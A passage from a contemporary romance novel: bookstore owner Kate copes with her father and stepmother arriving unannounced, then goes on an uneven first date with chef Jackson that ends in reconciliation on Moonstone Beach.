"Actually, I called to see if you wanted to have dinner with me. But if it's a bad time... "
"Oh, God. Jackson."
"Women usually say that to me under happier circumstances." She could hear the smile in his voice.
She groaned. "I thought you were somebody else."
"They usually don't say that." He paused. "Look. You were obviously in the middle of something. Why don't I... "
"No, wait." She held the phone away from herself, took a few deep breaths, and brought the receiver back to her ear. "Okay. Let's start over. Swept Away, this is Kate speaking. How may I help you today?"
"Do you have any Stephen King?"
"Oh, come on." She found herself smiling, forgetting about the stress she'd been feeling before he called. "You mentioned something about dinner."
"Yeah. I just... I was wondering if I could take you out some night. For dinner. That somebody else would cook. You know, like a... a date."
He was nervous. It was adorable that he was nervous.
"We could do that. What night did you have in mind?"
He cleared his throat. "Ah. Monday? I know Monday is a lousy date night, traditionally not a typical night for that sort of thing, but my schedule... "
"Monday is great."
"It is?"
"Sure. I eat on Mondays."
"Ha. I do, too."
"It works out, then."
He was silent for a moment as she enjoyed the charm of his discomfort. "I'd really like a do-over. The other night, the way I rushed off... I think we should do it over. But without the raw pork roast."
"What about the kissing? Would there be a do-over of the kissing?"
"I can always hope."
He told her he would pick her up at seven—it would give her just enough time to close the shop, go home, and change clothes, but not enough time to obsess over how the evening would go.
Though she suspected she would do that anyway.
As she hung up the phone, Jane Austen, the Swept Away cat, leaped onto the counter, and Kate stroked her smooth back. "Oh, Jane Austen. Do you think I'm ready for Jackson Graham?"
Jane Austen simply purred.
On Sunday, Kate knew she had to put thoughts of Jackson aside and figure out what the hell she was going to do for Art Walk. Since a full-scale carnival with a Ferris wheel, cotton candy, and a Tilt-a-Whirl was out of the question, she thought she had better focus on what would be practical and doable in less than four weeks' time.
An author appearance and book reading was the obvious choice—it was what they'd done every year—but it was boring. A tiny store like hers didn't attract big-name authors, and the kind of author she _could_ get didn't bring people in the door.
Still, this was a bookstore. It had to be an author.
So, a fun author. An entertaining author. Or at least someone who would arouse curiosity. It also had to be a local author, since she didn't have the budget to fly someone in from New York—or from anywhere, for that matter.
She went to the shop's Local Authors section and scanned the titles. They leaned heavily toward local history, with a few field guides to Central Coast plants and wildlife thrown in. Kate could feel herself nodding off just thinking about it. Sorting through the books on the shelves, she found a couple of biographies of local bigwigs, and a few things on Hearst Castle. That was interesting, but everything there was to say about William Randolph Hearst and the property up the coast had already been said. And anyone visiting Cambria from elsewhere had probably heard it already on a tour of the wildly popular attraction.
Kate was just about to give up hope when she came across one nearly forgotten volume tucked in at the far end of the bottom shelf. _Wild Woman_ , the autobiography of Cassidy McLean, a 1980s film star who had opened a refuge for wild animals in Central California.
_Hmm. Cassidy McLean._ Kate had forgotten about her.
The refuge, less than an hour inland over the rolling hills of Highway 41, had at one time housed a number of lions, an alligator, several species of monkey, a potbelly pig, and a Bengal tiger. Kate didn't know what kinds of animals were there now, but she knew the refuge was still operating. If Kate could get Cassidy McLean to talk about her film career, and maybe bring a small animal, she could attract the adults who remembered the movies and kids who wanted to see whatever creature the woman could coax into a cage and bring out here.
Inspired, Kate opened her laptop on the shop's counter and called up the website for the refuge. After confirming the place hadn't been shut down by local authorities, she composed an email to Cassidy McLean outlining her plan. She promised to stock a good supply of _Wild Woman_ for signing, and offered a small stipend—enough to pay for the gas to drive out here and a good dinner in town. She hit SEND and mentally crossed her fingers.
_This could work. But first she's got to say yes._
# 11
Kate was bustling around the shop at five thirty on Monday afternoon, preparing to close up early to give her plenty of time to get ready for—and obsess about—her date with Jackson, when Gen called.
"Your dad's here," Gen said. She had once told Kate that with difficult news, it was usually best to just blurt it out.
"He's where? Where is 'here'?"
"The house. He's here at the house. With his wife. And all their luggage. They said they'll be staying with you. For... for a while."
Kate closed her eyes and pressed one palm to the side of her head, as though she were in danger of having her brain fly out her ear. "What? _What?_ "
"I'm sorry, Kate." Gen sounded miserable. "I just got home from the gallery, and they were sitting on the front porch with this little dog in a carrier, and with a crap ton of luggage. They were waiting for you. I didn't know what to do. I... I let them in."
"You let them _in_?"
"Oh, Kate. Please don't kill me, sweetie. Remember that you love me."
"I do, but... Oh, jeez. I have a date with Jackson! In an hour and a half! I don't have time to deal with... with my father and Angela, and their damned dog!"
"What can I do? What should I do?" Gen was near tears. "I already let them in, but I could... I could... Well, kicking them out would be really awkward. Maybe find them another place to stay? I could call around... "
Kate let out a deep sigh. "No, don't worry about it. I'll be right home. I'll do... whatever it is I'm going to do. I don't know yet."
"Kate, I really am sorry."
"It's not your fault. See you soon."
On the drive home, Kate considered her options. She'd told her father that he and Angela couldn't stay with her. She'd suggested a B&B. She'd just go with that. She'd find them accommodations for tonight—good ones, a place that made her house look uncomfortable by comparison—shove them out the door, and then make herself busy over the next few days so she couldn't spend time with them.
Or she could just drive her car into the ocean.
She dismissed that last thought, because the car only had 42,000 miles on it. Seemed like too much of a waste.
She thought centering thoughts as she maneuvered her way along the winding roads that meandered through Lodge Hill, down toward Marine Terrace. _This isn't a life or death crisis. This is a minor inconvenience. I can deal with this. They'll be here for a short time, and then they'll go home. One foot in front of the other. Just get through it._
When she arrived in front of her house, she saw that an unfamiliar car was parked in the tiny, single-space driveway. The car made her do a double-take. It had to be Angela's. There was no way her father owned a powder pink Cadillac with a Mary Kay logo on the back window. Looking more closely, she saw the car sported a license plate frame that said I <3 MY POMERANIAN.
She parked her car on the street, walked to the front door, took a moment of silent reflection, and then went inside. She hadn't gotten both feet on the tile of the entryway before a small ball of dun-colored fur launched itself at her ankles, yipping and growling in a way that made it sound like it might be choking on a Milk-Bone.
"Jazzy! Oh my goodness. Jazzy, you stop that!" Angela came rushing toward the door, where she scooped up the tiny dog and enveloped it in her arms. "What did you do to upset him?"
"Hello, Angela. No, I didn't get bitten, but thank you so much for asking."
Angela narrowed her eyes at Kate. "Jazzy doesn't bite. Do you, Mr. Jazzykins? Huh? Do you?" She cooed to the dog in baby talk, rubbing its head and making kissing gestures.
At a glance, it appeared that Angela had fully adopted the theme of Mary Kay pink. She was wearing a pair of pink pleated trousers, a pink button-down blouse, pink sandals, and a full complement of makeup in various shades of pink. Kate was surprised the woman hadn't dyed her hair pink. Instead, Angela's hair—a shade of honey that, at her age, likely came from a salon—was done in a shoulder-length bob that flipped up at the ends, putting one in mind of Mary Tyler Moore circa the _Dick Van Dyke Show._
"Where's my father?" Kate asked.
"Now, what kind of welcome is that?" Angela put on her pouting face. "We drove more than seven hours to be here, and instead of greeting me with... "
"Where is my father?" Kate repeated.
Angela pursed her painted lips. "I sent him out to buy some decent coffee. It seems you only have the _bargain brand_." She shuddered delicately. "Cheap coffee makes my diverticulitis flare up."
"Well, when he gets back, we can get you checked in at the B&B, and... "
"Oh, that's not going to work out."
Kate came into the house, closed the door, set her purse on the kitchen counter, and turned toward Angela. "What's not going to work out?"
"The B&B."
"Why not?" Kate sounded whiny to her own ears, but at least she wasn't throwing glassware.
Angela sighed in a beleaguered and world-weary way. "I suppose they must have lost our reservation. They had no record of us, they said. Well, of course we came right here."
_They had no record of you because my father never called._
"Okay. I'm sure we can work something out. I'll get them on the phone."
"They're full."
Kate felt anger rising through her body and up to her chest, making it hard to breathe. She controlled her voice. "Well, this is a tourist town. There must be more than a hundred bed and breakfasts, hotels, motels, and guest houses here. I'm sure we can find something."
"I called around, but no one will take us with our dog," Angela complained.
"Ah. The dog. There's a kennel... "
"What?! I could never put Jazzy in a kennel. The very thought."
_Fine,_ Kate thought. _Mr. Jazzykins can stay here. We'll put you in the kennel._
Angela bent down and put Jazzy back on the floor. As she rose, she moaned about her lower-back pain. Jazzy ran around in a circle, lifted his tiny leg, and peed on the corner of Kate's sofa. Angela busied herself looking for something in her purse, which allowed her to pretend she hadn't seen Jazzy defile the furniture.
"Your dog just peed on my sofa."
"Hmm?" Angela didn't look up from where she was rooting around in the Coach bag—also pink.
"Your dog. He peed. On my sofa."
Angela waved an arm toward Kate. "Oh, just try a little vinegar and baking soda."
Since it was clear that Angela wasn't going to address the issue herself, Kate sighed and rooted around in her kitchen for the items. Since she didn't bake, it was unlikely she would have baking soda. And since she didn't make her own salad dressing, it was unlikely she would have vinegar. She didn't find the vinegar, but to her surprise, she did locate a box of baking soda in the back of a cabinet. She brought it out to the sofa with a damp cloth, to find Jazzy chewing on one of her throw pillows.
No response.
"Excuse me. Angela?"
"Hmm?" Angela raised her eyebrows questioningly but didn't look up from her iPhone.
"Could you put Jazzy in his carrier, please?"
Now Angela did look up, with an expression of shock and outrage. "But why?"
"Why? Seriously? He's chewing up my pillow."
Angela waved her arm again. "Oh, ha ha. Dogs will be naughty sometimes!"
"Angela! The carrier."
"But the drive took seven _hours_. The poor thing's been cooped up all _day_!"
Kate looked around helplessly, saw Jazzy's little rhinestoned leash sitting on top of his carrier, grabbed it, and thrust it at Angela. "Then take him for a walk."
At the sound of the word "walk," Jazzy ran to the two women and started yipping and spinning.
"He seems to like the idea," Kate said.
Angela shot Kate a look that said, _We're not done here_. She snatched the leash from Kate's hand and snapped it onto Jazzy's collar.
"Fine." She and the dog headed toward the door.
"And don't forget to clean up after him!" Kate yelled after her.
Her adrenaline surging, tension like a vise around her chest, Kate looked with incredulity at the amount of luggage they had brought. Two full-sized suitcases, two carry-on-sized rolling bags, the dog carrier, and three or four totes. It looked as though they planned to move in permanently.
_Over Angela's dead body. Or Jazzy's._
She was on her knees scrubbing at the urine-soaked sofa corner when the door opened behind her.
She looked up, the smell of dog pee wafting around her. "Dad."
Her father was standing in the doorway holding a grocery bag. In his early sixties, Thomas Bennet was an attractive man who presented himself in far better fashion than he could afford. He had dark hair sprinkled with gray. He wore khaki pants, a powder blue golf shirt, and—Kate could see this clearly from her vantage point—a pair of designer calfskin loafers.
"What are you doing down there?" he asked.
"Cleaning up your dog's pee."
"Ah. That's Jazzy for you. He pees on everything." He laughed jovially, as though this were a point of endless good-hearted amusement.
Kate abandoned her efforts with the sofa, stood up, and put the baking soda and rag aside. "Dad. What are you doing here?"
He looked at her in bemusement. "What do you mean? We talked on the phone about us visiting."
"Yes, but we didn't talk about when. And we talked about you staying at a B&B—not here."
He put the grocery sack down on the kitchen counter. As he removed the items from the sack, Kate could see that it contained not only coffee, but also brie, foie gras, and a $50 bottle of Scotch. Same old Dad.
"The B&B lost our reservation."
"So Angela told me. There are other hotels and B&Bs in town. A lot of them." She handed him her cell phone. "Start calling."
"Well." He looked at the phone, and then back at Kate. "I would have thought you'd be more welcoming. I'm your father. We hardly ever see each other. I thought... "
Oh, God, it was working. The guilt. She fought against it, but hell if it wasn't working.
"Dad, I didn't mean... "
"I know we have some issues between us. But I never thought it would come to me not being welcome in your home." He wiped at his eyes. Was he _crying?_
"I just thought you'd be more comfortable at a hotel, somewhere you can have privacy. You can see how small my place is." The argument sounded false to her own ears. As small as her house was, it was far bigger than a hotel room would be.
"Oh, we'll manage." He put the food into the refrigerator, as though the matter were settled. He started rummaging around in her cupboards for a glass, which he then filled with ice and two fingers of Scotch.
At that moment, Angela came back into the house, with Jazzy on his leash. She bent down and freed the dog, who immediately became a frenzied whirlwind of barking, snarling, and yipping. Then he dashed off into Kate's bedroom, probably intending to pee on something else.
"Well, that was a dreadful walk," Angela complained, sighing to indicate her suffering. "It's so _hilly_ here. And there are no _sidewalks_. I thought I was going to break an ankle in these shoes."
"There are sidewalks in town," Kate said helpfully. "Where the B&B is."
"Kate... " Thomas started in.
At that moment, with Angela complaining, Thomas gearing up for an argument, Kate going back onto her knees to take another crack at cleaning up the pee spot, and Jazzy in paroxysms of excitement over something in the next room, they heard a knock at the door, which was still open from Angela's arrival.
They all looked up as a group, and there, in the doorway, was Jackson, carrying a small pink bakery box and looking confused.
"Hi," he said.
"Oh," Kate said.
And from Angela: "Oh, my."
Kate scrambled up from her knees, noticed the foul-smelling rag in her hand, and rushed to dispose of it and wash her hands. "Jackson, come in," she said from the sink, her hands covered in suds. As she dried off, she made the introductions. "Jackson Graham, this is my father, Thomas Bennet, and his wife, Angela Bennet."
"I didn't know we were expecting company," Thomas said. We. As though it were his house, and he had every right to approve or disapprove the people who came to visit here.
"Jackson and I have a date," Kate said. "Which I would have mentioned if you'd called ahead to find out if this was a good time for a visit."
"There's no need to be so _rude_ ," Angela scolded.
Jackson, looking bemused, held the pink box out to Kate. "Cupcakes, from the restaurant. I was going to bring flowers, but then I thought, why be a cliché?"
Kate took the box from him and peered inside. The little box contained two perfect cupcakes with pale green frosting and a sprinkling of crushed nuts.
"Pistachio," he said.
She felt that same little melting of her heart that she felt every time she was with him. "You brought me cupcakes."
She looked up at him. " This is so much better than flowers."
He shifted from one foot to the other, smiling, obviously pleased.
Angela peered over Kate's shoulder and into the box. "Mmm, those look delicious!"
Kate snapped the box closed. Jackson said, "If I'd known Kate was having family over, I'd have brought enough for everyone. Maybe next time."
"Listen, Jackson," Kate said. "I got distracted when I got home, and I haven't showered or changed yet."
He shrugged. "I can wait. But you don't need to change on my account. You look beautiful the way you are."
"Oh, please," Angela scoffed. "Do you see what she's _wearing_? Of course she should change."
"On second thought," Kate said, "it might be better to just go. Let me grab my purse."
She put the cupcake box on the kitchen counter, retrieved her purse, ducked into the bathroom to arrange her hair and apply lipstick, and came back out. "Okay, I'm ready. Dad, Angela, we'll figure things out when I get back. Please don't let Jazzy pee on anything else."
As she spoke, the dog, having heard its name, emerged from the bedroom with a red patent leather peep toe pump in his mouth.
"Oh God," she said.
"I'll get it," Jackson offered. He scooped up the dog, gently pried the shoe from its mouth, put the shoe in the bedroom, and closed the bedroom door. Then he put the dog down on the kitchen tile. Jazzy promptly barked at the bedroom door, as though there were an intruder or a rasher of bacon on the other side.
"Let's go," Kate said.
They went out the front door and headed toward Jackson's truck. They got halfway down the driveway before Kate suddenly stopped.
"Hang on," she said.
She hurried back to the house, went in through the screen door, and found Angela with the bakery box in one hand and a pistachio cupcake in the other. Wordlessly, Kate plucked the cupcake out of Angela's hand, put it back in the box, and took the box away from her. She went back outside with the box to where Jackson was waiting for her.
"Now I'm ready," she said.
# 12
The evening was warm and slightly breezy, with the tang of salt water in the air. They drove in Jackson's Chevy Silverado, a full-sized pickup truck he sometimes used to haul supplies for the restaurant.
"Where are we headed?" Kate asked. She tried to make her voice sound light and carefree, but the train wreck going on at her house made that difficult. She wondered how long her father and Angela would be staying, where they would be staying, and how many more of her belongings Jazzy would pee on or chew up before she got home. She also wondered why she wasn't better at standing up to them.
"I thought, The Sandpiper," he said. The Sandpiper was a restaurant across a small, two-lane road from Moonstone Beach. Popular with the tourists, the place was generally considered to be the second-best restaurant in town—after Neptune.
"Mmm," Kate responded, without really hearing him.
"That work for you?"
"Yes, sure. That's fine."
They drove for a while in silence. Finally, Jackson said, "If this is a bad night for you... I mean, I could see you had a lot going on at home... "
"What?" She looked up at him, paying attention now. "Oh, no. I don't want to cancel. Home is pretty much the last place I want to be right now. You did me a favor getting me out of there when you did."
"Yeah, I got that sense." He maneuvered the truck along Ardath Drive, pausing once to let a deer and its fawn cross the road into the brush. He turned left onto Highway 1 and then made the turnoff for Moonstone Beach.
"Listen, if you want to talk about it... " he offered.
She did want to talk about it—oh God, she did—but she remembered what had happened the last time she'd talked to Jackson about her feelings. It had ended with him running out the door like he was competing for an Olympic medal. She didn't blame him for that. They barely knew each other—acquaintances for years, but on the wave-and-small-talk level—so she could hardly expect him to become her therapist. Especially if he was interested in her, which he apparently was. Everybody knew you didn't start a new relationship by whining about your problems.
"That's okay," she said, again aiming for that light, carefree, I'm-a-fun-girl tone. "Let's just enjoy our evening."
They arrived at the restaurant, and he parked the truck in the tiny gravel parking lot. She reached for her door handle, but she could see from the purposeful way that he was heading around the truck that he intended to open her door for her. She waited, and let him.
Only now that they were away from the circus going on at her house did she notice how good he looked. He was wearing charcoal slacks, a deep blue button-down shirt open at the neck, and a black blazer. His wavy hair was combed back, still damp from his shower. He was tall and broad, and he smelled like soap and a hint of aftershave. Getting out of the truck, with him standing so near her, she wanted to fold herself into his arms. She could hardly do that, though, within the first few minutes of their first date.
She felt unprepared, uncomfortable, somewhat frumpy and trollish compared to him. She was dressed nicely enough—she'd put on a good outfit for work that morning—but she hadn't had the opportunity to shower, change, and primp for him. She should have accepted his offer to wait for her. But if she'd done that, he'd have had a chance to talk to her father.
No, rushing out the door was definitely the way to go.
He held the door for her as they entered the restaurant. The place was usually packed with tourists during the summer season, but now, on a Monday night, the dining room held just a sprinkling of patrons.
"Jackson Graham," the hostess said warmly. "To what do we owe the honor?"
Jackson looked embarrassed, making Kate wonder whether he had a history with the tall blonde.
"Ah, knock it off, Lindsey." He sounded pleased but uncomfortable with her attention. "You know Kate Bennet?"
"Of course. Hi, Kate."
"Can you give us a table by a window?" Jackson asked.
Lindsey looked around and fixed her face in mock consternation. "As packed as we are, that's going to be a challenge. But if you slip me a twenty... " She put one hand on his bicep.
"Very funny," he said.
"Follow me." She grabbed two menus and led the way toward a table for two with a spectacular view of the ocean, now pink and orange with the glow of sunset.
"Your server will be right with you," Lindsey said after they were seated and had their menus open in front of them. She gave Jackson a look and a wink, and then sashayed away.
"So, how do you know Lindsey?" Kate willed her voice to sound idly curious, as though she were simply making light conversation. In fact, she was reading the terrain. Kate knew Jackson's reputation with women, but it was one thing to know, and it was quite another to come face to face with the evidence during a date. Was Jackson so prolific with women that Kate would be encountering his ex-lovers on every corner? And how would she feel about that? It paid to know such things.
"Oh." He looked at the menu as though he were barely listening. He seemed a little too casual to be convincing. "She worked at Neptune for a while. You know how it is, we're in the same business. People tend to know each other."
"So you didn't date her?"
He looked up from the menu. "If I had, would there be something wrong with that?"
"No, of course not. It's just... "
"What?" He put the menu down.
She shrugged. "I just like to know the lay of the land."
"The _lay_ "—he smirked at the choice of words—"is that yes, we did date. A long time ago. It didn't last long."
"Why not?"
He looked at the menu again. "Ah, Christ."
She leaned back in her chair, offended. "Look, if I can't even ask a simple question... "
"What?" He looked at her. "No, not that. It's this wine list. I can't believe they serve the Cambria Crest cabernet but not the Sapphire Seas. Who'd the guy at Cambria Crest have to screw to work that?" He shook his head with disgust.
Kate tried to gauge whether he was deflecting the conversation away from Lindsey, or if he really did care that much about the wine list. She decided it was the latter, since it meshed well with everything Rose had told her about him.
In a moment, their server, a tall, slender brunette named Ashley, who, Kate thankfully observed, gave off no particular vibe toward Jackson, came to take their drink order. Jackson seemed flummoxed by the lack of Sapphire Seas, but rallied nicely to order a San Simeon Estate Reserve cabernet sauvignon. She ordered the same thing, partly because she figured he knew good wines better than she did, and partly because she feared being yelled at if she made a choice he didn't approve of.
When they had placed their orders, Ashley turned to Jackson. "Max heard you were here, and if you don't mind, he'd like to put together something special for you."
"Max?" Kate asked.
"Max Singer, our head chef," Ashley added for Kate's benefit.
Jackson put down his menu. "Tell him to wow me."
"I think that's the idea," Ashley said.
When she was gone, Jackson said, "Max also worked at Neptune, before he got the gig here. I taught him everything he knows. First I had to undo the damage they did at that crappy culinary school he attended." He shook his head at the memory.
"Well, you must trust him, or we wouldn't be here."
He looked at her as though that were obvious. "I trained him."
Their drinks came, and they settled in, sipping the rich, dark wine and gazing out at the view, which was becoming more colorful with the passing minutes.
"So, how did you become a chef?" Kate asked.
"My mother is an excellent cook. She wasn't trained or anything, she just had a feel for it. I used to help her in the kitchen, and after a while I was better at it than she was. Something about food, it's just... " He reached for words. "You can paint a picture and hang it on the wall, and it just sits there looking pretty. Or not pretty, depending on the kind of art. But food—making a meal that nourishes people, makes them feel full and happy and well-cared-for—that's an art form that _means_ something."
Kate nodded appreciatively. "Do you think you might open your own restaurant someday?"
His head swayed a bit in a gesture of uncertainty. "Maybe. But first I need to land a top job in one of the food capitals."
"Food capitals?"
"You know. New York. San Francisco. Los Angeles. One of the cities where a chef can really make a name for himself." He changed the subject slightly. "How is it that you never learned to cook?"
She smiled. "My mother saw cooking as drudgery that you had to endure for your survival. Most of her recipes involved boxed macaroni or cream of mushroom soup."
Jackson winced. "Ouch."
"Oh, I don't know. I liked it at the time. I still do, on occasion. It used to bug my dad, though. He has loftier tastes."
He sipped his wine and then raised the subject they were both thinking about.
"So, your dad... I take it his visit wasn't exactly planned?"
She wanted to launch into the subject, wanted to rail against her father, wanted to pour out her frustrations, seek advice, seek reassurance. She wanted to explain the troubled relationship she'd always had with her father, and the reasons for it, and her repeated, failed attempts to find common ground.
But last time she talked about her family, he ran.
And then, there was the fact that every piece of dating advice she'd ever read warned against dumping your problems on someone on a first date. Keep it light, keep it positive. No discussion of exes, and certainly no airing of long-held family dysfunction. No whining about how your father never fully accepted you, and then left you and your mother for another woman.
She knew that if she started talking about it, she wouldn't stop, and there probably would be tears. And then she'd never see Jackson again, except when he needed a book or she wanted a meal at Neptune.
"No, the visit wasn't planned. And houseguests can be stressful."
"No doubt." He nodded. "But I got the sense there was something else going on, as well."
"No, not really."
He looked at her skeptically. "No bad blood between you and Angela?"
_Oh, you have no idea._
Instead, she said, "What? No."
Ashley returned bearing two plates. She set them down with a flourish. "For your first course, heirloom tomato and haricot vert salad."
After Ashley was gone, Kate looked at her salad. "This looks wonderful. I don't even know what haricot vert is."
"They're the green beans," Jackson said. "A particular variety. You see how they're thinner than the green beans you're probably used to?"
"Okay, yeah."
To Kate, the salad was delicious. The flavor of the tomatoes, combined with the beans and a zesty, citrusy dressing, was fresh and appealing. Jackson was poking and scowling at his.
"What's wrong?" she asked.
"These tomatoes aren't local."
She put down her fork. "How can you tell?"
He cocked his head at her. "How can you tell if a book is a first edition? You know books, I know tomatoes. Among other things. You see the texture here? That means it was harvested probably weeks ago, and then it was sent on a truck to get here. Why the hell doesn't Max use local tomatoes? A salad like this lives or dies on the freshness of the tomato." He shook his head. "I taught him better than this."
She proceeded to finish her salad while Jackson simply poked at his, eating a few beans but avoiding the nonlocal tomatoes.
Ashley cleared their plates, scowling at Jackson's uneaten salad, and returned with their main course. "Merguez with chickpea puree and eggplant jam," she announced.
"Huh," Jackson said, looking at the plate. A long coil of grilled sausage lay atop a bed of puree, with the eggplant jam on top. A garnish of dandelion greens was artfully arranged in an X over it all, as though one might have used a map to find the food.
"Wow," Kate said. She took a slice of the sausage, dipped it in the puree, and tasted it with a bit of the eggplant jam. The combination of flavors exploded in her mouth, making her moan with pleasure.
Jackson was moaning, too, but for different reasons. "The dandelion greens are starting to wilt," he complained. "And the merguez is overcooked. The ends are dry. Ugh."
Kate was starting to get irritated. "Jackson."
"Just eat, please."
"All right." He had a few bites, but when she looked up at him, he was staring at the plate with a furrowed brow and stormy eyes.
"So, did you enjoy culinary school? I'll bet you've got a lot of kitchen horror stories." She tried to change the subject.
He didn't hear her.
He looked up, startled.
"Good God. Do you just want to leave?"
"No." He shook his head. "No. But I do want to talk to the chef. I'm gonna kick his ass. I'll be right back." He wadded up his cloth napkin, threw it down beside the plate, and stalked off toward the kitchen.
Kate had been abandoned by dates before. Kenny MacElroy stood her up when she was sixteen and they were supposed to go to the movies. Evan Price took her to a party when she was twenty and left with another girl. But never had she been left at the dinner table while her date went off to berate the chef.
She sat there for a while, eating her dinner. Was it bad manners to go ahead without him? Maybe, but his manners were unquestionably worse, leaving her here alone. Yes, the dandelion greens were slightly wilted. And yes, it was true that in some areas, the sausage—whatever fancy name they'd called it, it was still sausage—was a little charred. But that didn't change the fact that she was hungry. And it also didn't change the fact that the mingled flavors of the puree, the fancy sausage, and the eggplant jam were undeniably appealing.
When she was halfway through her meal, she heard raised voices coming from the kitchen, followed by the sound of breaking glass. A couple of possible scenarios there. Jackson and Max were throwing stemware, or maybe some frightened, beleaguered server had wandered through the kitchen at the wrong moment and had become startled.
When she'd had enough—enough food, and also enough of Jackson's shenanigans—she placed her napkin next to her plate, gathered up her purse and her sweater, and walked out.
The evening was mild and clear. A few tourists walked on the wooden trail that led along the bluffs above the beach. The sun was down but the sky hadn't fully given way to darkness. A pale, silvery blue lay across the water, the day's last display of splendor.
Why hadn't she ordered dessert? She should have, should have ordered them all. When he got the check he'd think twice about abandoning a hungry woman at the dinner table.
She remembered the cupcakes. A crappy day, followed by a crappy evening, could maybe be salvaged with some really excellent cupcakes. It wouldn't hurt to try. She went to Jackson's truck, found it unlocked, and retrieved the pink box from the seat. She pulled her sweater on, walked across the two-lane road that separated The Sandpiper from the beach, and went down a rickety set of ancient wooden steps and onto the sand.
This close to darkness, most of the beachgoers were gone. A few people walked along the water line. A family with a small child, a couple holding hands. She found a seat on a piece of driftwood. The sound of the crashing waves was soothing. In the place where the sun had set, the water was a shimmery grey-blue, the color of forgotten dreams.
She pulled a cupcake out of the box and took a bite.
_Oh, God_. She closed her eyes and her taste buds hummed. Despite the pleasure going on in her mouth, she couldn't help thinking of the chaos of her day.
Her father. Althea. Jackson.
That little yappy dog was probably chewing up her mother's copy of _Beyond the Boundaries of Desire_ right now, as she sat here.
She heard footsteps on the sand behind her just as she was digging into the second cupcake.
She turned her head and looked around, her mouth full of pistachio goodness. Jackson.
He sat down on the log beside her.
"You're eating my cupcake?"
She swallowed and looked at him sideways. "Who says it's yours? You brought them for me. That makes them mine. You want a cupcake, go back into The Sandpiper and make one. I'm sure Max won't mind."
Given his temper, she expected a fight. Was in the mood for one, actually. But instead of yelling, he chuckled.
"You're right. Giving up my cupcake is the least I can do. Listen, I'm sorry. I shouldn't have left you at the table. That was rude."
"You think?" She peeled the paper off the bottom of the last cupcake and popped the rest into her mouth.
"Max was pissed."
"He wasn't the only one." She wadded up the cupcake paper and put it back into the pink box.
Jackson turned to her. "Look, Kate... "
"Jackson. I don't know what you thought you were doing, but... "
"I was nervous."
She wasn't sure what she'd been expecting to hear—some defense of his giant chef ego, maybe—but it wasn't that.
He looked down at his hands, which were resting in his lap. The posture was endearingly childlike. "I was nervous. About the date. About you. And when I'm nervous... I control things. I'm never nervous in the kitchen. I think I just wanted to be somewhere I felt like I knew what I was doing."
She found his confession confounding. "Now, why would you be nervous?"
"Yes. Seriously."
Now he was the one exasperated. "Because. Jesus. Is it possible you don't know that I've had a thing for you for years? My friends know. Your friends probably know. Lindsey back at the restaurant knows. I didn't want to fuck this up. So then I did. Fuck it up, I mean."
The wings of little birds flapped in her chest. Tiny starlings.
"You've had a thing for me for years?"
Still, he looked down at his hands. "Ever since the first time I came into the bookstore."
"You bought a Michael Chabon."
He looked up at her. "Yeah. You remember that?"
"I have a photographic memory for every book my customers buy."
His eyebrows shot up. "Really?"
"No, you idiot." She smacked his arm. "Not really. I remembered because it's you."
"Because... Oh." He grinned, and it melted her, just a little.
"Jackson. We've known each other for, what? Years. Why didn't you say something before now if you felt that way?"
He picked up a small piece of driftwood from the sand and worried it in his hands. "Because I don't do well with women."
Kate let out a little scoffing sound. "That's not what I hear."
"That's not what I mean. I don't do well with women long term. We get together, we have fun, and then... " He dropped the wood and made a gesture with his hands that might have indicated a magician's trick— _poof, it's gone_ —or might have indicated an explosion. _Boom._
One side of her mouth quirked up, and she glanced at him out of the corner of her eye. "Did you leave them at restaurants?"
"I might have. Once or twice. But, hell, what does it matter what I did in there? It's not like the date was going anywhere in the first place."
She sat up straight, surprised. "What do you mean?"
"Oh, come on, Kate. You wouldn't _talk_ to me. Just small talk. Chitchat. It was clear you had a thousand things going on in your head, and they all had a big KEEP OUT sign posted on them."
She looked at him, started to say something, then stopped.
"See?" He pointed at her. "You won't _tell_ me anything. I want to get to know you, but you're not letting me in."
"It's our first date," she said, exasperated.
He made a seesawing gesture with his hand. "Sort of."
"What do you mean 'sort of '?"
"Our first date, yeah. But like you pointed out, we've known each other for years. Waving hello, how was your weekend, all of that superficial bullshit. We've already done the chitchat. I'm sick of chitchat."
She picked up the piece of wood he'd discarded and held it in her palm, turned it in her fingers. "Well. I seem to remember talking to you—really talking to you—that night at my house. And you ran away."
"What?" He looked confused.
"I talked about my mom, and how much I miss her, and _that_ was real. I _cried_ , for God's sake. And you couldn't get out of there fast enough."
"You... That's... " He got up and stood on the sand in front of her. "You thought that's why I left?"
"Well, since I didn't see any bears chasing you, yeah."
He ran a hand through his hair, mussing it. "Ah, Christ. That's... " He gathered his thoughts. "It was the kiss."
"The kiss."
"Usually kissing someone is seen as a good thing. Usually, people stay."
"Uh huh. People stay, and then they have sex, and it's all hot and great, and it lasts for maybe a couple of weeks, and after that... " He made the _poof_ gesture again.
Though it was dark on the beach now, a light dawned in Kate's mind. He was scared. He wanted her for more than fun, for more than he'd had with other women. She _meant_ something.
"Come here. Sit down." She patted the log beside her. He sat, and she felt the warmth of him amid the cool evening. She scooted closer so that their bodies touched. She reached out and took his hand. He enveloped her hand in his, their fingers entwining. She rested her head on his shoulder, and she could hear him take in a deep, long breath.
"Okay," she said. "You asked what was going on with my dad. He showed up unannounced, with enough luggage to suggest he plans to stay for a very long time. He and I... It's complicated. He left my mother for Angela when I was twenty-two. In some ways, it was a new beginning for my mom. She moved here, found her place in the world. But at the time, she was devastated. And so was I."
He squeezed her hand.
"Now, our relationship is mostly him seeing what he can get from me. He came to ask for money. I'm certain of that. And every time he shows up with an agenda instead of just wanting to be with me... "
Tears rolled down her cheek, and she swiped at them with her free hand. "See?" She laughed bitterly. "When I talk to you about real stuff, I end up crying."
He reached out and touched her chin, turned her face toward him, and spoke softly. "I'm not running away. No bears."
"No bears?" Her voice was a whisper.
He kissed her gently, and she felt a warmth spread through her that was like a hot bath, or a blanket on a cold day. Like the comfort of coming home.
# 13
They walked on the beach in the moonlight, holding hands. He told her about how he'd come to live in Cambria. A guy he'd known in culinary school had decided to open a restaurant in one of California's most scenic towns and had recruited him to become head chef. She told him about her marriage and divorce—the short version. Marcus had been abusive, not physically but emotionally. He'd slept with other women and then gaslighted her, trying to convince her that her suspicions were the result of her own paranoia and emotional fragility.
When they came to the end of Moonstone Beach, to where the sand ends below the bluffs, he kissed her again. He turned her to him and wrapped her in his arms. The kiss before had been sweet, comforting. This one was urgent, sending a surge of electricity through her veins. She felt his heartbeat against her body, tasted his mouth, felt the rightness of it. The inevitability of him.
